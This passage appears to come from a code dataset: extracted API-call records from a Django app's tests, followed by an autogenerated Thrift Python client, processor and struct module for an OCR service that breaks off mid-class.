'f"""kuala"""'}), "(username=f'kuala')\n", (8259, 8278), False, 'from licornes.models import User\n'), ((8288, 8393), 'licornes.models.Licorne.objects.create', 'Licorne.objects.create', ([], {'nom': 'f"""Licorne de {u}"""', 'identifiant': 'f"""{cls.identifiant_existant}"""', 'createur': 'u'}), "(nom=f'Licorne de {u}', identifiant=\n f'{cls.identifiant_existant}', createur=u)\n", (8310, 8393), False, 'from licornes.models import Licorne\n'), ((8474, 8531), 'licornes.models.Licorne.objects.get', 'Licorne.objects.get', ([], {'identifiant': 'cls.identifiant_existant'}), '(identifiant=cls.identifiant_existant)\n', (8493, 8531), False, 'from licornes.models import Licorne\n'), ((9632, 9690), 'licornes.models.Licorne.objects.get', 'Licorne.objects.get', ([], {'identifiant': 'self.identifiant_existant'}), '(identifiant=self.identifiant_existant)\n', (9651, 9690), False, 'from licornes.models import Licorne\n'), ((9845, 9900), 'bs4.BeautifulSoup', 'BeautifulSoup', (['response.content'], {'features': '"""html.parser"""'}), "(response.content, features='html.parser')\n", (9858, 9900), False, 'from bs4 import BeautifulSoup\n'), ((10195, 10250), 'bs4.BeautifulSoup', 'BeautifulSoup', (['response.content'], {'features': '"""html.parser"""'}), "(response.content, features='html.parser')\n", (10208, 10250), False, 'from bs4 import BeautifulSoup\n'), ((11098, 11153), 'bs4.BeautifulSoup', 'BeautifulSoup', (['response.content'], {'features': '"""html.parser"""'}), "(response.content, features='html.parser')\n", (11111, 11153), False, 'from bs4 import BeautifulSoup\n'), ((11913, 11968), 'bs4.BeautifulSoup', 'BeautifulSoup', (['response.content'], {'features': '"""html.parser"""'}), "(response.content, features='html.parser')\n", (11926, 11968), False, 'from bs4 import BeautifulSoup\n'), ((12606, 12664), 'licornes.models.Licorne.objects.get', 'Licorne.objects.get', ([], {'identifiant': 'self.identifiant_existant'}), '(identifiant=self.identifiant_existant)\n', (12625, 12664), False, 'from licornes.models import Licorne\n'), ((18104, 18159), 'bs4.BeautifulSoup', 'BeautifulSoup', (['response.content'], {'features': '"""html.parser"""'}), "(response.content, features='html.parser')\n", (18117, 18159), False, 'from bs4 import BeautifulSoup\n'), ((18565, 18620), 'bs4.BeautifulSoup', 'BeautifulSoup', (['response.content'], {'features': '"""html.parser"""'}), "(response.content, features='html.parser')\n", (18578, 18620), False, 'from bs4 import BeautifulSoup\n'), ((19042, 19097), 'bs4.BeautifulSoup', 'BeautifulSoup', (['response.content'], {'features': '"""html.parser"""'}), "(response.content, features='html.parser')\n", (19055, 19097), False, 'from bs4 import BeautifulSoup\n'), ((19533, 19588), 'bs4.BeautifulSoup', 'BeautifulSoup', (['response.content'], {'features': '"""html.parser"""'}), "(response.content, features='html.parser')\n", (19546, 19588), False, 'from bs4 import BeautifulSoup\n'), ((19991, 20046), 'bs4.BeautifulSoup', 'BeautifulSoup', (['response.content'], {'features': '"""html.parser"""'}), "(response.content, features='html.parser')\n", (20004, 20046), False, 'from bs4 import BeautifulSoup\n'), ((20783, 20821), 'licornes.models.User.objects.create', 'User.objects.create', ([], {'username': 'f"""kuala"""'}), "(username=f'kuala')\n", (20802, 20821), False, 'from licornes.models import User\n'), ((20834, 20869), 'licornes.models.User.objects.get', 'User.objects.get', ([], {'username': 'f"""kuala"""'}), "(username=f'kuala')\n", (20850, 20869), False, 'from licornes.models import User\n'), ((20879, 20984), 'licornes.models.Licorne.objects.create', 'Licorne.objects.create', ([], {'nom': 'f"""Licorne de {u}"""', 'identifiant': 'f"""{cls.identifiant_existant}"""', 'createur': 'u'}), "(nom=f'Licorne de {u}', identifiant=\n f'{cls.identifiant_existant}', createur=u)\n", (20901, 20984), False, 'from licornes.models import Licorne\n'), ((21043, 21085), 'licornes.models.Licorne.objects.get', 'Licorne.objects.get', ([], {'nom': 'f"""Licorne de {u}"""'}), "(nom=f'Licorne de {u}')\n", (21062, 21085), False, 'from licornes.models import Licorne\n'), ((21099, 21170), 'licornes.models.Etape.objects.create', 'Etape.objects.create', ([], {'licorne': 'l', 'auteur': 'u', 'localisation': '"""Paris, France"""'}), "(licorne=l, auteur=u, localisation='Paris, France')\n", (21119, 21170), False, 'from licornes.models import Etape\n'), ((21202, 21277), 'licornes.models.Etape.objects.create', 'Etape.objects.create', ([], {'licorne': 'l', 'auteur': 'u', 'localisation': '"""Berlin, Allemagne"""'}), "(licorne=l, auteur=u, localisation='Berlin, Allemagne')\n", (21222, 21277), False, 'from licornes.models import Etape\n'), ((21309, 21380), 'licornes.models.Etape.objects.create', 'Etape.objects.create', ([], {'licorne': 'l', 'auteur': 'u', 'localisation': '"""San Francisco"""'}), "(licorne=l, auteur=u, localisation='San Francisco')\n", (21329, 21380), False, 'from licornes.models import Etape\n'), ((21497, 21548), 'licornes.models.Etape.objects.get', 'Etape.objects.get', ([], {'localisation': '"""Berlin, Allemagne"""'}), "(localisation='Berlin, Allemagne')\n", (21514, 21548), False, 'from licornes.models import Etape\n'), ((21745, 21796), 'licornes.models.Etape.objects.get', 'Etape.objects.get', ([], {'localisation': '"""Berlin, Allemagne"""'}), "(localisation='Berlin, Allemagne')\n", (21762, 21796), False, 'from licornes.models import Etape\n'), ((627, 681), 'licornes.models.User.objects.create', 'User.objects.create', ([], {'username': 'f"""utilisateur {user_id}"""'}), "(username=f'utilisateur {user_id}')\n", (646, 681), False, 'from licornes.models import User\n'), ((698, 749), 'licornes.models.User.objects.get', 'User.objects.get', ([], {'username': 'f"""utilisateur {user_id}"""'}), "(username=f'utilisateur {user_id}')\n", (714, 749), False, 'from licornes.models import User\n'), ((1265, 1281), 'django.urls.reverse', 'reverse', (['"""index"""'], {}), "('index')\n", (1272, 1281), False, 'from django.urls import reverse\n'), ((1418, 1434), 'django.urls.reverse', 'reverse', (['"""index"""'], {}), "('index')\n", (1425, 1434), False, 'from django.urls import reverse\n'), ((1630, 1646), 'django.urls.reverse', 'reverse', (['"""index"""'], {}), "('index')\n", (1637, 1646), False, 'from django.urls import reverse\n'), ((2090, 2106), 'django.urls.reverse', 'reverse', (['"""index"""'], {}), "('index')\n", (2097, 2106), False, 'from django.urls import reverse\n'), ((2545, 2561), 'django.urls.reverse', 'reverse', (['"""index"""'], {}), "('index')\n", (2552, 2561), False, 'from django.urls import reverse\n'), ((2818, 2834), 'django.urls.reverse', 'reverse', (['"""index"""'], {}), "('index')\n", (2825, 2834), False, 'from django.urls import reverse\n'), ((3034, 3050), 'django.urls.reverse', 'reverse', (['"""index"""'], {}), "('index')\n", (3041, 3050), False, 'from django.urls import reverse\n'), ((3433, 3449), 'django.urls.reverse', 'reverse', (['"""index"""'], {}), "('index')\n", (3440, 3449), False, 'from django.urls import reverse\n'), ((3852, 3868), 'django.urls.reverse', 'reverse', (['"""index"""'], {}), "('index')\n", (3859, 3868), False, 'from django.urls import reverse\n'), ((4294, 4310), 'django.urls.reverse', 'reverse', (['"""index"""'], {}), "('index')\n", (4301, 4310), False, 'from django.urls import reverse\n'), ((5140, 5154), 'django.urls.reverse', 'reverse', (['"""add"""'], {}), "('add')\n", (5147, 5154), False, 'from django.urls import reverse\n'), ((5291, 5305), 'django.urls.reverse', 'reverse', (['"""add"""'], {}), "('add')\n", (5298, 5305), False, 'from django.urls import reverse\n'), ((5498, 5512), 'django.urls.reverse', 'reverse', (['"""add"""'], {}), "('add')\n", (5505, 5512), False, 'from django.urls import reverse\n'), ((5715, 5729), 'django.urls.reverse', 'reverse', (['"""add"""'], {}), "('add')\n", (5722, 5729), False, 'from django.urls import reverse\n'), ((6559, 6611), 'django.urls.reverse', 'reverse', (['"""etape"""'], {'args': '[self.identifiant_inexistant]'}), "('etape', args=[self.identifiant_inexistant])\n", (6566, 6611), False, 'from django.urls import reverse\n'), ((6696, 6710), 'django.urls.reverse', 'reverse', (['"""add"""'], {}), "('add')\n", (6703, 6710), False, 'from django.urls import reverse\n'), ((7018, 7032), 'django.urls.reverse', 'reverse', (['"""add"""'], {}), "('add')\n", (7025, 7032), False, 'from django.urls import reverse\n'), ((7320, 7334), 'django.urls.reverse', 'reverse', (['"""add"""'], {}), "('add')\n", (7327, 7334), False, 'from django.urls import reverse\n'), ((7473, 7525), 'django.urls.reverse', 'reverse', (['"""etape"""'], {'args': '[self.identifiant_inexistant]'}), "('etape', args=[self.identifiant_inexistant])\n", (7480, 7525), False, 'from django.urls import reverse\n'), ((8842, 8858), 'django.urls.reverse', 'reverse', (['"""etape"""'], {}), "('etape')\n", (8849, 8858), False, 'from django.urls import reverse\n'), ((9221, 9271), 'django.urls.reverse', 'reverse', (['"""etape"""'], {'args': '[self.identifiant_existant]'}), "('etape', args=[self.identifiant_existant])\n", (9228, 9271), False, 'from django.urls import reverse\n'), ((9408, 9458), 'django.urls.reverse', 'reverse', (['"""etape"""'], {'args': '[self.identifiant_existant]'}), "('etape', args=[self.identifiant_existant])\n", (9415, 9458), False, 'from django.urls import reverse\n'), ((9726, 9776), 'django.urls.reverse', 'reverse', (['"""etape"""'], {'args': '[self.identifiant_existant]'}), "('etape', args=[self.identifiant_existant])\n", (9733, 9776), False, 'from django.urls import reverse\n'), ((10076, 10126), 'django.urls.reverse', 'reverse', (['"""etape"""'], {'args': '[self.identifiant_existant]'}), "('etape', args=[self.identifiant_existant])\n", (10083, 10126), False, 'from django.urls import reverse\n'), ((10979, 11029), 'django.urls.reverse', 'reverse', (['"""etape"""'], {'args': '[self.identifiant_existant]'}), "('etape', args=[self.identifiant_existant])\n", (10986, 11029), False, 'from django.urls import reverse\n'), ((11727, 11779), 'django.urls.reverse', 'reverse', (['"""etape"""'], {'args': '[self.identifiant_inexistant]'}), "('etape', args=[self.identifiant_inexistant])\n", (11734, 11779), False, 'from django.urls import reverse\n'), ((12484, 12534), 'django.urls.reverse', 'reverse', (['"""etape"""'], {'args': '[self.identifiant_existant]'}), "('etape', args=[self.identifiant_existant])\n", (12491, 12534), False, 'from django.urls import reverse\n'), ((12972, 13015), 'django.urls.reverse', 'reverse', (['"""etape"""'], {'args': '[self.l.identifiant]'}), "('etape', args=[self.l.identifiant])\n", (12979, 13015), False, 'from django.urls import reverse\n'), ((13152, 13168), 'django.urls.reverse', 'reverse', (['"""index"""'], {}), "('index')\n", (13159, 13168), False, 'from django.urls import reverse\n'), ((13279, 13322), 'django.urls.reverse', 'reverse', (['"""etape"""'], {'args': '[self.l.identifiant]'}), "('etape', args=[self.l.identifiant])\n", (13286, 13322), False, 'from django.urls import reverse\n'), ((13694, 13737), 'django.urls.reverse', 'reverse', (['"""etape"""'], {'args': '[self.l.identifiant]'}), "('etape', args=[self.l.identifiant])\n", (13701, 13737), False, 'from django.urls import reverse\n'), ((14076, 14119), 'django.urls.reverse', 'reverse', (['"""etape"""'], {'args': '[self.l.identifiant]'}), "('etape', args=[self.l.identifiant])\n", (14083, 14119), False, 'from django.urls import reverse\n'), ((15339, 15393), 'licornes.models.User.objects.create', 'User.objects.create', ([], {'username': 'f"""utilisateur {user_id}"""'}), "(username=f'utilisateur {user_id}')\n", (15358, 15393), False, 'from licornes.models import User\n'), ((15410, 15461), 'licornes.models.User.objects.get', 'User.objects.get', ([], {'username': 'f"""utilisateur {user_id}"""'}), "(username=f'utilisateur {user_id}')\n", (15426, 15461), False, 'from licornes.models import User\n'), ((16432, 16465), 'django.urls.reverse', 'reverse', (['"""licorne"""'], {'args': '[id_lic]'}), "('licorne', args=[id_lic])\n", (16439, 16465), False, 'from django.urls import reverse\n'), ((16647, 16680), 'django.urls.reverse', 'reverse', (['"""licorne"""'], {'args': '[id_lic]'}), "('licorne', args=[id_lic])\n", (16654, 16680), False, 'from django.urls import reverse\n'), ((16923, 16956), 'django.urls.reverse', 'reverse', (['"""licorne"""'], {'args': '[id_lic]'}), "('licorne', args=[id_lic])\n", (16930, 16956), False, 'from django.urls import reverse\n'), ((17441, 17474), 'django.urls.reverse', 'reverse', (['"""licorne"""'], {'args': '[id_lic]'}), "('licorne', args=[id_lic])\n", (17448, 17474), False, 'from django.urls import reverse\n'), ((17776, 17809), 'django.urls.reverse', 'reverse', (['"""licorne"""'], {'args': '[id_lic]'}), "('licorne', args=[id_lic])\n", (17783, 17809), False, 'from django.urls import reverse\n'), ((18054, 18087), 'django.urls.reverse', 'reverse', (['"""licorne"""'], {'args': '[id_lic]'}), "('licorne', args=[id_lic])\n", (18061, 18087), False, 'from django.urls import reverse\n'), ((18515, 18548), 'django.urls.reverse', 'reverse', (['"""licorne"""'], {'args': '[id_lic]'}), "('licorne', args=[id_lic])\n", (18522, 18548), False, 'from django.urls import reverse\n'), ((18992, 19025), 'django.urls.reverse', 'reverse', (['"""licorne"""'], {'args': '[id_lic]'}), "('licorne', args=[id_lic])\n", (18999, 19025), False, 'from django.urls import reverse\n'), ((19500, 19516), 'django.urls.reverse', 'reverse', (['"""index"""'], {}), "('index')\n", (19507, 19516), False, 'from django.urls import reverse\n'), ((19958, 19974), 'django.urls.reverse', 'reverse', (['"""index"""'], {}), "('index')\n", (19965, 19974), False, 'from django.urls import reverse\n'), ((21832, 21862), 'django.urls.reverse', 'reverse', (['"""media"""'], {'args': '[e1.id]'}), "('media', args=[e1.id])\n", (21839, 21862), False, 'from django.urls import reverse\n'), ((21994, 22027), 'django.urls.reverse', 'reverse', (['"""media"""'], {'args': '[11111111]'}), "('media', args=[11111111])\n", (22001, 22027), False, 'from django.urls import reverse\n'), ((824, 943), 'licornes.models.Licorne.objects.create', 'Licorne.objects.create', ([], {'nom': 'f"""Licorne {licorne_id} de {user_id}"""', 'identifiant': 'f"""{user_id}-{licorne_id}"""', 'createur': 'u'}), "(nom=f'Licorne {licorne_id} de {user_id}',\n identifiant=f'{user_id}-{licorne_id}', createur=u)\n", (846, 943), False, 'from licornes.models import Licorne\n'), ((6305, 6353), 'os.path.join', 'os.path.join', (['"""licornes/tests"""', '"""image-test.jpg"""'], {}), "('licornes/tests', 'image-test.jpg')\n", (6317, 6353), False, 'import os\n'), ((6407, 6421), 'django.urls.reverse', 'reverse', (['"""add"""'], {}), "('add')\n", (6414, 6421), False, 'from django.urls import reverse\n'), ((7598, 7640), 'os.path.join', 'os.path.join', (['"""licornes/tests"""', '"""spam.txt"""'], {}), "('licornes/tests', 'spam.txt')\n", (7610, 7640), False, 'import os\n'), ((7693, 7707), 'django.urls.reverse', 'reverse', (['"""add"""'], {}), "('add')\n", (7700, 7707), False, 'from django.urls import reverse\n'), ((15536, 15687), 'licornes.models.Licorne.objects.create', 'Licorne.objects.create', ([], {'nom': 'f"""Licorne {licorne_id} de {user_id}"""', 'identifiant': 'f"""{user_id}-{licorne_id}"""', 'createur': 'u', 'image': 'f"""{licorne_id}.png"""'}), "(nom=f'Licorne {licorne_id} de {user_id}',\n identifiant=f'{user_id}-{licorne_id}', createur=u, image=\n f'{licorne_id}.png')\n", (15558, 15687), False, 'from licornes.models import Licorne\n'), ((15826, 15854), 'licornes.models.Licorne.objects.latest', 'Licorne.objects.latest', (['"""id"""'], {}), "('id')\n", (15848, 15854), False, 'from licornes.models import Licorne\n'), ((20342, 20372), 'os.path.basename', 'os.path.basename', (["l.img['src']"], {}), "(l.img['src'])\n", (20358, 20372), False, 'import os\n'), ((20206, 20258), 're.sub', 're.sub', (['"""Licorne ([0-9]+).*"""', '"""\\\\1"""', 'l.h2.text', 're.M'], {}), "('Licorne ([0-9]+).*', '\\\\1', l.h2.text, re.M)\n", (20212, 20258), False, 'import re\n')]
|
#
# Autogenerated by Thrift Compiler (0.11.0)
#
# DO NOT EDIT UNLESS YOU ARE SURE THAT YOU KNOW WHAT YOU ARE DOING
#
# options string: py
#
from thrift.Thrift import TType, TMessageType, TFrozenDict, TException, TApplicationException
from thrift.protocol.TProtocol import TProtocolException
from thrift.TRecursive import fix_spec
import sys
import logging
from .ttypes import *
from thrift.Thrift import TProcessor
from thrift.transport import TTransport
all_structs = []
class Iface(object):
def version(self):
pass
def get_ocr(self, image):
"""
Parameters:
- image
"""
pass
def line_ocr(self, image):
"""
Parameters:
- image
"""
pass
def cut_image(self, image, cut_type):
"""
Parameters:
- image
- cut_type
"""
pass
class Client(Iface):
def __init__(self, iprot, oprot=None):
self._iprot = self._oprot = iprot
if oprot is not None:
self._oprot = oprot
self._seqid = 0
def version(self):
self.send_version()
return self.recv_version()
def send_version(self):
self._oprot.writeMessageBegin('version', TMessageType.CALL, self._seqid)
args = version_args()
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_version(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = version_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "version failed: unknown result")
def get_ocr(self, image):
"""
Parameters:
- image
"""
self.send_get_ocr(image)
return self.recv_get_ocr()
def send_get_ocr(self, image):
self._oprot.writeMessageBegin('get_ocr', TMessageType.CALL, self._seqid)
args = get_ocr_args()
args.image = image
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_get_ocr(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = get_ocr_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "get_ocr failed: unknown result")
def line_ocr(self, image):
"""
Parameters:
- image
"""
self.send_line_ocr(image)
return self.recv_line_ocr()
def send_line_ocr(self, image):
self._oprot.writeMessageBegin('line_ocr', TMessageType.CALL, self._seqid)
args = line_ocr_args()
args.image = image
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_line_ocr(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = line_ocr_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "line_ocr failed: unknown result")
def cut_image(self, image, cut_type):
"""
Parameters:
- image
- cut_type
"""
self.send_cut_image(image, cut_type)
return self.recv_cut_image()
def send_cut_image(self, image, cut_type):
self._oprot.writeMessageBegin('cut_image', TMessageType.CALL, self._seqid)
args = cut_image_args()
args.image = image
args.cut_type = cut_type
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_cut_image(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = cut_image_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "cut_image failed: unknown result")
class Processor(Iface, TProcessor):
def __init__(self, handler):
self._handler = handler
self._processMap = {}
self._processMap["version"] = Processor.process_version
self._processMap["get_ocr"] = Processor.process_get_ocr
self._processMap["line_ocr"] = Processor.process_line_ocr
self._processMap["cut_image"] = Processor.process_cut_image
def process(self, iprot, oprot):
(name, type, seqid) = iprot.readMessageBegin()
if name not in self._processMap:
iprot.skip(TType.STRUCT)
iprot.readMessageEnd()
x = TApplicationException(TApplicationException.UNKNOWN_METHOD, 'Unknown function %s' % (name))
oprot.writeMessageBegin(name, TMessageType.EXCEPTION, seqid)
x.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
return
else:
self._processMap[name](self, seqid, iprot, oprot)
return True
def process_version(self, seqid, iprot, oprot):
args = version_args()
args.read(iprot)
iprot.readMessageEnd()
result = version_result()
try:
result.success = self._handler.version()
msg_type = TMessageType.REPLY
except TTransport.TTransportException:
raise
except TApplicationException as ex:
logging.exception('TApplication exception in handler')
msg_type = TMessageType.EXCEPTION
result = ex
except Exception:
logging.exception('Unexpected exception in handler')
msg_type = TMessageType.EXCEPTION
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("version", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_get_ocr(self, seqid, iprot, oprot):
args = get_ocr_args()
args.read(iprot)
iprot.readMessageEnd()
result = get_ocr_result()
try:
result.success = self._handler.get_ocr(args.image)
msg_type = TMessageType.REPLY
except TTransport.TTransportException:
raise
except TApplicationException as ex:
logging.exception('TApplication exception in handler')
msg_type = TMessageType.EXCEPTION
result = ex
except Exception:
logging.exception('Unexpected exception in handler')
msg_type = TMessageType.EXCEPTION
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("get_ocr", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_line_ocr(self, seqid, iprot, oprot):
args = line_ocr_args()
args.read(iprot)
iprot.readMessageEnd()
result = line_ocr_result()
try:
result.success = self._handler.line_ocr(args.image)
msg_type = TMessageType.REPLY
except TTransport.TTransportException:
raise
except TApplicationException as ex:
logging.exception('TApplication exception in handler')
msg_type = TMessageType.EXCEPTION
result = ex
except Exception:
logging.exception('Unexpected exception in handler')
msg_type = TMessageType.EXCEPTION
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("line_ocr", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_cut_image(self, seqid, iprot, oprot):
args = cut_image_args()
args.read(iprot)
iprot.readMessageEnd()
result = cut_image_result()
try:
result.success = self._handler.cut_image(args.image, args.cut_type)
msg_type = TMessageType.REPLY
except TTransport.TTransportException:
raise
except TApplicationException as ex:
logging.exception('TApplication exception in handler')
msg_type = TMessageType.EXCEPTION
result = ex
except Exception:
logging.exception('Unexpected exception in handler')
msg_type = TMessageType.EXCEPTION
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("cut_image", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
# HELPER FUNCTIONS AND STRUCTURES
class version_args(object):
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('version_args')
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
all_structs.append(version_args)
version_args.thrift_spec = (
)
class version_result(object):
"""
Attributes:
- success
"""
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.STRING:
self.success = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('version_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.STRING, 0)
oprot.writeString(self.success.encode('utf-8') if sys.version_info[0] == 2 else self.success)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
all_structs.append(version_result)
version_result.thrift_spec = (
(0, TType.STRING, 'success', 'UTF8', None, ), # 0
)
class get_ocr_args(object):
"""
Attributes:
- image
"""
def __init__(self, image=None,):
self.image = image
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.image = iprot.readBinary()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('get_ocr_args')
if self.image is not None:
oprot.writeFieldBegin('image', TType.STRING, 1)
oprot.writeBinary(self.image)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
all_structs.append(get_ocr_args)
get_ocr_args.thrift_spec = (
None, # 0
(1, TType.STRING, 'image', 'BINARY', None, ), # 1
)
class get_ocr_result(object):
"""
Attributes:
- success
"""
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.STRING:
self.success = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('get_ocr_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.STRING, 0)
oprot.writeString(self.success.encode('utf-8') if sys.version_info[0] == 2 else self.success)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
all_structs.append(get_ocr_result)
get_ocr_result.thrift_spec = (
(0, TType.STRING, 'success', 'UTF8', None, ), # 0
)
class line_ocr_args(object):
"""
Attributes:
- image
"""
def __init__(self, image=None,):
self.image = image
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.image = iprot.readBinary()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('line_ocr_args')
if self.image is not None:
oprot.writeFieldBegin('image', TType.STRING, 1)
oprot.writeBinary(self.image)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
all_structs.append(line_ocr_args)
line_ocr_args.thrift_spec = (
None, # 0
(1, TType.STRING, 'image', 'BINARY', None, ), # 1
)
class line_ocr_result(object):
"""
Attributes:
- success
"""
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.STRING:
self.success = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('line_ocr_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.STRING, 0)
oprot.writeString(self.success.encode('utf-8') if sys.version_info[0] == 2 else self.success)
oprot.writeFieldEnd()
oprot.writeFieldStop()
